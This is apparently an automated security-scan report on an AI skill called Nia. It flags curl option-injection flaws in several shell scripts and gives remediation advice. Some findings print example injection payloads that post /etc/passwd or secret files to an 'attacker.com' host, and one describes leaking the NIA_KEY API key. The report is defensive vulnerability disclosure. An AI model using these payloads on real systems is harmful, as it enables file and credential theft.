Trust Assessment
Nia received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 7 findings: 1 critical, 5 high, 0 medium, and 0 low severity. Key findings include Unsanitized file path in 'curl -F' allows command injection, Unencoded URL parameters allow 'curl' option injection in folders.sh, Unencoded URL parameters allow 'curl' option injection in repos.sh.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings7
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Unsanitized file path in 'curl -F' allows command injection The `deps.sh upload` command uses `curl -F "file=@$1"` where `$1` is the manifest file path. If an attacker can control the value of `$1`, they can inject arbitrary `curl` command-line options. For example, providing `$1` as `'-o /tmp/evil.sh'` could create a file, or `'-F "data=@/etc/passwd;filename=passwd" http://attacker.com'` could exfiltrate sensitive files. This is a direct command injection vulnerability. Ensure that the file path passed to `curl -F "file=@..."` is strictly validated and sanitized, or use a safer method for file uploads that doesn't involve direct command-line argument construction from untrusted input. If the file path is expected to be a local file, ensure it's a canonical path and does not contain `curl` options. A common mitigation is to use `--form-string` instead of `-F` if the filename itself is not meant to be part of the form data, or to ensure the filename is prefixed with `./` to prevent it from being interpreted as an option. | LLM | scripts/deps.sh:60 | |
| HIGH | Unencoded URL parameters allow 'curl' option injection in folders.sh In `scripts/folders.sh`, the `cmd_read` function constructs a URL by directly appending user-controlled arguments (`line_start`, `line_end`, `MAX_LENGTH`) without proper URL encoding. The `urlencode` function used elsewhere is insufficient for query parameters. When this URL is passed to `nia_get_raw` (which uses `curl`), `curl` may interpret parts of the query string as command-line options if they contain spaces and hyphens. This could lead to arbitrary `curl` option injection, potentially allowing data exfiltration (e.g., `--output /dev/null --data-binary @/etc/passwd`) or other malicious actions. All user-controlled parameters appended to a URL query string must be fully URL-encoded using a robust URL encoding function before being concatenated. For example, `url="${url}&line_start=$(urlencode_full "$3")"` where `urlencode_full` correctly handles all special URL characters. | LLM | scripts/folders.sh:109 | |
| HIGH | Unencoded URL parameters allow 'curl' option injection in repos.sh In `scripts/repos.sh`, the `cmd_tree` function constructs a URL by directly appending user-controlled arguments (`branch`, `INCLUDE_PATHS`, `EXCLUDE_PATHS`, `FILE_EXTENSIONS`, `EXCLUDE_EXTENSIONS`) without proper URL encoding. The `urlencode` function used elsewhere is insufficient for query parameters. When this URL is passed to `nia_get_raw` (which uses `curl`), `curl` may interpret parts of the query string as command-line options if they contain spaces and hyphens. This could lead to arbitrary `curl` option injection, potentially allowing data exfiltration or other malicious actions. All user-controlled parameters appended to a URL query string must be fully URL-encoded using a robust URL encoding function before being concatenated. For example, `params="${params}&branch=$(urlencode_full "$branch")"` where `urlencode_full` correctly handles all special URL characters. | LLM | scripts/repos.sh:80 | |
| HIGH | Unencoded URL parameters allow 'curl' option injection in sources.sh In `scripts/sources.sh`, several commands (`cmd_list`, `cmd_get`, `cmd_resolve`, `cmd_update`, `cmd_delete`, `cmd_sync`) construct URLs by directly appending user-controlled arguments (e.g., `type` from `$1`, `$2`, or `TYPE` environment variable) without proper URL encoding. The `urlencode` function used elsewhere is insufficient for query parameters. When these URLs are passed to `nia_get` or `nia_delete` (which use `curl`), `curl` may interpret parts of the query string as command-line options if they contain spaces and hyphens. This could lead to arbitrary `curl` option injection, potentially allowing data exfiltration or other malicious actions. All user-controlled parameters appended to a URL query string must be fully URL-encoded using a robust URL encoding function before being concatenated. For example, `if [ -n "$type" ]; then url="${url}?type=$(urlencode_full "$type")"; fi` where `urlencode_full` correctly handles all special URL characters. | LLM | scripts/sources.sh:100 | |
| HIGH | Potential data exfiltration via 'curl' command injection The identified command injection vulnerabilities in `scripts/deps.sh` (via `curl -F "file=@$1"`) and in `scripts/folders.sh`, `scripts/repos.sh`, `scripts/sources.sh` (via unencoded URL parameters leading to `curl` option injection) create a high risk of data exfiltration. An attacker exploiting these vulnerabilities could inject `curl` options such as `--data-binary @/etc/passwd` or `--output /dev/null -F "secret=@/path/to/secret" http://attacker.com` to send arbitrary local files or sensitive environment variables to an external server. Address the underlying command injection vulnerabilities by properly sanitizing and encoding all user-controlled inputs before they are used in `curl` commands or URL constructions. | LLM | scripts/deps.sh, scripts/folders.sh, scripts/repos.sh, scripts/sources.sh:60 | |
| HIGH | Potential credential harvesting via 'curl' command injection The identified command injection vulnerabilities (specifically `curl` option injection) could allow an attacker to craft `curl` commands that exfiltrate the `NIA_KEY` (API key) to an external server. Although the `NIA_KEY` is passed in an `Authorization` header, an injected `curl` option like `--header "X-My-Key: $NIA_KEY"` or `--trace-ascii /dev/stderr` followed by redirection could expose the key. Address the underlying command injection vulnerabilities by properly sanitizing and encoding all user-controlled inputs. This will prevent an attacker from manipulating `curl` to expose the API key. | LLM | scripts/lib.sh:20 | |
| INFO | Skill designed to read arbitrary local files The `folders.sh` script, specifically `cmd_create` and `cmd_sync`, is designed to read the contents of a user-specified local directory and upload them to the Nia API. While this is the explicit purpose of the 'Local Folders' feature, it means the skill has broad access to the local filesystem. Users should be aware that any files within the specified directory (excluding common ignored patterns) will be read and potentially transmitted. The implementation uses `find` with quoted paths and `cat` with quoted filenames, which mitigates simple path traversal, but the inherent capability is broad. No direct code remediation needed as this is intended functionality. However, it's important for users to understand the scope of local file access granted when using this feature. Ensure clear documentation and user prompts regarding the implications of indexing local folders. | LLM | scripts/folders.sh:20 |
Scan History
Embed Code
[](https://skillshield.io/report/992db70d5cc521bb)
Powered by SkillShield